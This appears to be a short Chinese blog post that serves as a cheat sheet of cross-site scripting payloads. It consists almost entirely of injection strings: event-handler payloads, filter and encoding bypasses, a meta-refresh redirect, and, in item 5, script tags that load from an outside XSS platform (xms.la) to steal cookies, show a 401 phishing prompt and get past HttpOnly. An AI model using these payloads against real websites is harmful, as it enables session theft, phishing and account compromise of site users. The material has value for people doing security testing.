xss大法

发布于 2020-10-01  114 次阅读


直接上payload

1、"><img/src/onerror=with(document)body.appendChild(document.createElement('script')).src='https://image.3001.net/images/new/dian.png'></img>

2、123123'"><input onfocus=confirm`1` autofocus>

3、/list?type=\%22%3E%3CsCrIpT%3Ealert(1)%3C/ScRiPt%3E

4、&mobilphone=11111%22%20onblur=[1].find(alert)%20%22

5、xss平台:

Cookie:<script src=//xms.la/XEI></script>
401钓鱼:<script src="https://www.xms.la/x.php?c=XEI&m=401"></script>
PHPinfo Bypass HttpIOnly:<script src="https://www.xms.la/x.php?c=XEI&m=phpinfo&url=自定义PHPinfo地址"></script>

6、<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

7、'><SCRIPT>alert("XSS")</SCRIPT><xss a='

8、<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

9、111%22%20onmouseover%3D%22%20onload%3Dalert(1)%3B%22

10、绕过<>'过滤
/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="

下面是替换符号绕过

&#34;      &quot;      “      双引号
&#38;      &amp;      &      &符号
&#60;      &lt;          <      小于号
&#62;      &gt;         >      大于号
    
例子:
<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&#38;XSS&#38;)</script>
如果这都被过滤了。那我们可以使用 JavaScript 的 fromCharCode 函数,这个函数把指定的 Unicode
值转换成字符串。
<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83))</script>
loginFrom=wap_tb%3C/script%3E<meta http-equiv='refresh' content='0; url=https://www.baidu.com' />


学不动了,带带孩子吧。